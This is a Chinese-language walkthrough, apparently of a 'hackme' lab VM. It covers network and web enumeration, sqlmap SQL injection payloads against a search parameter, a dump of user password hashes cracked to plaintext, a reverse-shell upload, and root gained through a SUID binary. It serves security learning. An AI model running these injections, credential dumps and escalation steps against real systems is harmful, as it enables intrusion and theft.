信息收集
1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1 00:50:56:c0:00:08 VMware, Inc.
192.168.12.2 00:50:56:ec:d1:ca VMware, Inc.
192.168.12.138 00:50:56:3f:82:5b VMware, Inc.
192.168.12.254 00:50:56:e4:dd:fa VMware, Inc.
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.341 seconds (109.35 hosts/sec). 4 responded
2、netdiscover
netdiscover -r 192.168.12.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.12.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.12.2 00:50:56:ec:d1:ca 1 60 VMware, Inc.
192.168.12.138 00:50:56:3f:82:5b 1 60 VMware, Inc.
192.168.12.254 00:50:56:e4:dd:fa 1 60 VMware, Inc.
3、nmap
主机存活探测
┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 15:25 CST
Nmap scan report for 192.168.12.1
Host is up (0.0049s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.000082s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.138
Host is up (0.000082s latency).
MAC Address: 00:50:56:3F:82:5B (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.000048s latency).
MAC Address: 00:50:56:E4:DD:FA (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.41 seconds
端口探测
┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.138 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 15:25 CST
Nmap scan report for 192.168.12.138
Host is up (0.0023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:50:56:3F:82:5B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.65 seconds
信息探测
┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 22,80 192.168.12.138 --min-rate
10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 15:30 CST
Nmap scan report for 192.168.12.138
Host is up (0.00030s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
| 256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_ 256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:50:56:3F:82:5B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.30 ms 192.168.12.138
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.84 seconds
漏洞探测
┌──(root㉿ru)-[~/kali]
└─# nmap --script "vuln" -p 22,80 192.168.12.138 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 15:27 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.138
Host is up (0.00012s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /login.php:
| PHPSESSID:
|_ httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /login.php: Possible admin folder
|_ /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.34 (ubuntu)'
MAC Address: 00:50:56:3F:82:5B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 54.98 seconds
4、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.12.138 nikto
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.12.138
+ Target Hostname: 192.168.12.138
+ Target Port: 80
+ Start Time: 2023-12-18 15:27:44 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.34 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.34 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /login.php: Admin login page/section found.
+ 8102 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-12-18 15:27:59 (GMT8) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
5、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.12.138
WhatWeb report for http://192.168.12.138
Status : 200 OK
Title :
IP : 192.168.12.138
Country : RESERVED, ZZ
Summary : Apache[2.4.34], HTTPServer[Ubuntu Linux][Apache/2.4.34 (Ubuntu)], Meta-Refresh-Redirect[login.php]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.34 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.34 (Ubuntu) (from server string)
[ Meta-Refresh-Redirect ]
Meta refresh tag is a deprecated URL element that can be
used to optionally wait x seconds before reloading the
current page or loading a new page. More info:
https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refresh
String : login.php
HTTP Headers:
HTTP/1.1 200 OK
Date: Mon, 18 Dec 2023 07:28:34 GMT
Server: Apache/2.4.34 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 100
Connection: close
Content-Type: text/html; charset=UTF-8
WhatWeb report for http://192.168.12.138/login.php
Status : 200 OK
Title : Login
IP : 192.168.12.138
Country : RESERVED, ZZ
Summary : Apache[2.4.34], Bootstrap[3.3.7], Cookies[PHPSESSID], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.34 (Ubuntu)], PasswordField[password]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.34 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Version : 3.3.7
Website : https://getbootstrap.com/
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : PHPSESSID
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.34 (Ubuntu) (from server string)
[ PasswordField ]
find password fields
String : password (from field name)
HTTP Headers:
HTTP/1.1 200 OK
Date: Mon, 18 Dec 2023 07:28:35 GMT
Server: Apache/2.4.34 (Ubuntu)
Set-Cookie: PHPSESSID=0ibvmsioq46c5ltsn7gd6irqjl; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 527
Connection: close
Content-Type: text/html; charset=UTF-8
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
目录探测
1、gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.12.138 -x php,txt,bak,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.12.138
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,bak,html,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/index.php (Status: 200) [Size: 100]
/login.php (Status: 200) [Size: 1245]
/register.php (Status: 200) [Size: 1937]
/uploads (Status: 301) [Size: 318] [--> http://192.168.12.138/uploads/]
/welcome.php (Status: 302) [Size: 0] [--> login.php]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/config.php (Status: 200) [Size: 0]
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/server-status (Status: 403) [Size: 302]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.12.138 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594
Output File: /root/kali/reports/http_192.168.12.138/_23-12-18_15-42-05.txt
Target: http://192.168.12.138/
[15:42:05] Starting:
[15:42:07] 403 - 293B - /.php
[15:42:29] 200 - 0B - /config.php
[15:42:43] 200 - 527B - /login.php
[15:42:44] 302 - 0B - /logout.php -> login.php
[15:42:56] 200 - 594B - /register.php
[15:42:59] 403 - 302B - /server-status
[15:42:59] 403 - 303B - /server-status/
[15:43:08] 301 - 318B - /uploads -> http://192.168.12.138/uploads/
[15:43:08] 200 - 458B - /uploads/
3、dirb
┌──(root㉿ru)-[~/kali]
└─# dirb http://192.168.12.138
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Dec 18 15:52:28 2023
URL_BASE: http://192.168.12.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.12.138/ ----
+ http://192.168.12.138/index.php (CODE:200|SIZE:100)
+ http://192.168.12.138/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.12.138/uploads/
---- Entering directory: http://192.168.12.138/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Dec 18 15:52:30 2023
DOWNLOADED: 4612 - FOUND: 2
WEB
创建个账号登陆进入!
测试sql注入,但是没有回显,也不能命令执行。目录也没有什么东西,我们尝试用sqlmap跑一下!
sqlmap
1、爆库
┌──(root㉿ru)-[~/kali]
└─# sqlmap -r '/root/kali/2.txt' --dbs --level=3
___
__H__
___ ___[.]_____ ___ ___ {1.7.11#stable}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:43:01 /2023-12-18/
[16:43:01] [INFO] parsing HTTP request from '/root/kali/2.txt'
[16:43:01] [INFO] testing connection to the target URL
[16:43:01] [INFO] testing if the target URL content is stable
[16:43:02] [INFO] target URL content is stable
[16:43:02] [INFO] testing if POST parameter 'search' is dynamic
......
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 5054 FROM (SELECT(SLEEP(5)))FxOS)-- hOLy
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: search=1' UNION ALL SELECT CONCAT(0x7178707671,0x4b77734765697a664f554f46706a6b67704d757145416571795a4870526c484a63646d7347645963,0x71787a6271),NULL,NULL-- -
---
[16:43:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[16:43:14] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapphacking
[16:43:14] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.12.138'
[*] ending @ 16:43:14 /2023-12-18/
2、爆表
┌──(root㉿ru)-[~/kali]
└─# sqlmap -r '/root/kali/2.txt' --level=3 -D webapphacking --tables
___
__H__
___ ___["]_____ ___ ___ {1.7.11#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:47:02 /2023-12-18/
[16:47:02] [INFO] parsing HTTP request from '/root/kali/2.txt'
[16:47:02] [INFO] resuming back-end DBMS 'mysql'
[16:47:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 5054 FROM (SELECT(SLEEP(5)))FxOS)-- hOLy
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: search=1' UNION ALL SELECT CONCAT(0x7178707671,0x4b77734765697a664f554f46706a6b67704d757145416571795a4870526c484a63646d7347645963,0x71787a6271),NULL,NULL-- -
---
[16:47:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[16:47:02] [INFO] fetching tables for database: 'webapphacking'
Database: webapphacking
[2 tables]
+-------+
| books |
| users |
+-------+
[16:47:03] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.12.138'
[*] ending @ 16:47:03 /2023-12-18/
3、爆列
┌──(root㉿ru)-[~/kali]
└─# sqlmap -r '/root/kali/2.txt' --level=3 -D webapphacking -T users --columns
___
__H__
___ ___[']_____ ___ ___ {1.7.11#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:47:33 /2023-12-18/
[16:47:33] [INFO] parsing HTTP request from '/root/kali/2.txt'
[16:47:33] [INFO] resuming back-end DBMS 'mysql'
[16:47:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 5054 FROM (SELECT(SLEEP(5)))FxOS)-- hOLy
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: search=1' UNION ALL SELECT CONCAT(0x7178707671,0x4b77734765697a664f554f46706a6b67704d757145416571795a4870526c484a63646d7347645963,0x71787a6271),NULL,NULL-- -
---
[16:47:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[16:47:33] [INFO] fetching columns for table 'users' in database 'webapphacking'
Database: webapphacking
Table: users
[5 columns]
+---------+----------------------+
| Column | Type |
+---------+----------------------+
| name | varchar(30) |
| user | varchar(30) |
| address | varchar(50) |
| id | smallint(5) unsigned |
| pasword | varchar(70) |
+---------+----------------------+
[16:47:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.12.138'
[*] ending @ 16:47:33 /2023-12-18/
4、爆字段
┌──(root㉿ru)-[~/kali]
└─# sqlmap -r '/root/kali/2.txt' --level=3 -D webapphacking -T users -C user,pasword --dump
___
__H__
___ ___[.]_____ ___ ___ {1.7.11#stable}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 16:49:41 /2023-12-18/
[16:49:41] [INFO] parsing HTTP request from '/root/kali/2.txt'
[16:49:41] [INFO] resuming back-end DBMS 'mysql'
[16:49:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 5054 FROM (SELECT(SLEEP(5)))FxOS)-- hOLy
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: search=1' UNION ALL SELECT CONCAT(0x7178707671,0x4b77734765697a664f554f46706a6b67704d757145416571795a4870526c484a63646d7347645963,0x71787a6271),NULL,NULL-- -
---
[16:49:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[16:49:41] [INFO] fetching entries of column(s) '`user`,pasword' for table 'users' in database 'webapphacking'
[16:49:42] [INFO] recognized possible password hashes in column 'pasword'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:49:43] [INFO] writing hashes to a temporary file '/tmp/sqlmaptih_o6x7290104/sqlmaphashes-jyiyw1xs.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:49:45] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> y
[16:49:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[16:49:47] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[16:49:47] [INFO] starting 2 processes
[16:49:50] [INFO] cracked password 'commando' for hash '6269c4f71a55b24bad0f0267d9be5508'
[16:49:54] [INFO] cracked password 'testtest' for hash '05a671c66aefea124cc08b76ea6d30bb'
[16:49:55] [INFO] cracked password 'hello' for hash '5d41402abc4b2a76b9719d911017c592'
[16:49:58] [INFO] cracked password 'p@ssw0rd' for hash '0f359740bd1cda994f8b55330c86d845'
[16:50:01] [INFO] using suffix '1'
[16:50:15] [INFO] using suffix '123'
[16:50:20] [INFO] cracked password 'woll123' for hash '2a3ac5fec79fdbfe874a48aa01069de8'
Database: webapphacking
Table: users
[7 entries]
+------------+---------------------------------------------+
| user | pasword |
+------------+---------------------------------------------+
| user1 | 5d41402abc4b2a76b9719d911017c592 (hello) |
| user2 | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| user3 | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| test | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| superadmin | 2386acb2cf356944177746fc92523983 (Uncrackable) |
| test1 | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| woll | 2a3ac5fec79fdbfe874a48aa01069de8 (woll123) |
+------------+---------------------------------------------+
六个用户
user1 | 5d41402abc4b2a76b9719d911017c592 (hello)
user2 | 6269c4f71a55b24bad0f0267d9be5508 (commando)
user3 | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd)
test | 05a671c66aefea124cc08b76ea6d30bb (testtest)
superadmin | 2386acb2cf356944177746fc92523983 (Uncrackable)
test1 | 05a671c66aefea124cc08b76ea6d30bb (testtest)
superadmin | 2386acb2cf356944177746fc92523983 (Uncrackable)
这个用户应该就是超级管理员的用户了!
文件上传&反弹shell
我们使用超级管理员登录!发现一个上传页面!
我们上传一个反弹shell木马!
提权
1、系统信息收集
$ python2 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hackme:/$ uname -a
uname -a
Linux hackme 4.18.0-16-generic #17-Ubuntu SMP Fri Feb 8 00:06:57 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
www-data@hackme:/$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.10
Release: 18.10
Codename: cosmic
www-data@hackme:/$ cat /etc/passwd | grep "home" | grep -v nologin
cat /etc/passwd | grep "home" | grep -v nologin
hackme:x:1000:1000:hackme:/home/hackme:/bin/bash
www-data@hackme:/$
www-data@hackme:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@hackme:/$
www-data@hackme:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/snap/core/16202/bin/mount
/snap/core/16202/bin/ping
/snap/core/16202/bin/ping6
/snap/core/16202/bin/su
/snap/core/16202/bin/umount
/snap/core/16202/usr/bin/chfn
/snap/core/16202/usr/bin/chsh
/snap/core/16202/usr/bin/gpasswd
/snap/core/16202/usr/bin/newgrp
/snap/core/16202/usr/bin/passwd
/snap/core/16202/usr/bin/sudo
/snap/core/16202/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/16202/usr/lib/openssh/ssh-keysign
/snap/core/16202/usr/lib/snapd/snap-confine
/snap/core/16202/usr/sbin/pppd
/snap/core22/1033/usr/bin/chfn
/snap/core22/1033/usr/bin/chsh
/snap/core22/1033/usr/bin/gpasswd
/snap/core22/1033/usr/bin/mount
/snap/core22/1033/usr/bin/newgrp
/snap/core22/1033/usr/bin/passwd
/snap/core22/1033/usr/bin/su
/snap/core22/1033/usr/bin/sudo
/snap/core22/1033/usr/bin/umount
/snap/core22/1033/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/1033/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/sudo
/home/legacy/touchmenot
/bin/mount
/bin/umount
/bin/ping
/bin/ntfs-3g
/bin/su
/bin/fusermount
2、本地提权
递归搜索可利用文件 hackme用户
www-data@hackme:/home$ ls -alR hackme
ls -alR hackme
hackme:
total 48
drwxr-xr-x 5 hackme hackme 4096 Mar 25 2019 .
drwxr-xr-x 4 root root 4096 Mar 26 2019 ..
-rw------- 1 hackme hackme 5794 Mar 27 2019 .bash_history
-rw-r--r-- 1 hackme hackme 220 Sep 12 2018 .bash_logout
-rw-r--r-- 1 hackme hackme 3771 Sep 12 2018 .bashrc
drwx------ 2 hackme hackme 4096 Mar 13 2019 .cache
drwx------ 3 hackme hackme 4096 Mar 13 2019 .gnupg
drwxrwxr-x 3 hackme hackme 4096 Mar 21 2019 .local
-rw------- 1 root root 5588 Mar 25 2019 .mysql_history
-rw-r--r-- 1 hackme hackme 807 Sep 12 2018 .profile
-rw-r--r-- 1 hackme hackme 0 Mar 13 2019 .sudo_as_admin_successful
ls: cannot open directory 'hackme/.cache': Permission denied
ls: cannot open directory 'hackme/.gnupg': Permission denied
hackme/.local:
total 12
drwxrwxr-x 3 hackme hackme 4096 Mar 21 2019 .
drwxr-xr-x 5 hackme hackme 4096 Mar 25 2019 ..
drwx------ 3 hackme hackme 4096 Mar 21 2019 share
ls: cannot open directory 'hackme/.local/share': Permission denied
递归搜索可利用文件 legacy用户
www-data@hackme:/home$ ls -alR legacy
ls -alR legacy
legacy:
total 20
drwxr-xr-x 2 root root 4096 Mar 26 2019 .
drwxr-xr-x 4 root root 4096 Mar 26 2019 ..
-rwsr--r-x 1 root root 8472 Mar 26 2019 touchmenot
3、get root
www-data@hackme:/home$ cd legacy
cd legacy
www-data@hackme:/home/legacy$ ls
ls
touchmenot
www-data@hackme:/home/legacy$ ./touchmenot
./touchmenot
root@hackme:/home/legacy# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
root@hackme:/home/legacy# cd /root
cd /root
root@hackme:/root# ls -al
ls -al
total 32
drwx------ 5 root root 4096 Mar 26 2019 .
drwxr-xr-x 23 root root 4096 Mar 13 2019 ..
-rw------- 1 root www-data 54 Mar 26 2019 .bash_history
-rw-r--r-- 1 root root 3106 Aug 6 2018 .bashrc
drwxr-xr-x 3 root root 4096 Mar 13 2019 .local
-rw-r--r-- 1 root root 148 Aug 6 2018 .profile
drwx------ 2 root root 4096 Mar 13 2019 .ssh
drwxr-xr-x 3 root root 4096 Mar 13 2019 snap
这个可执行程序可以执行进行提权。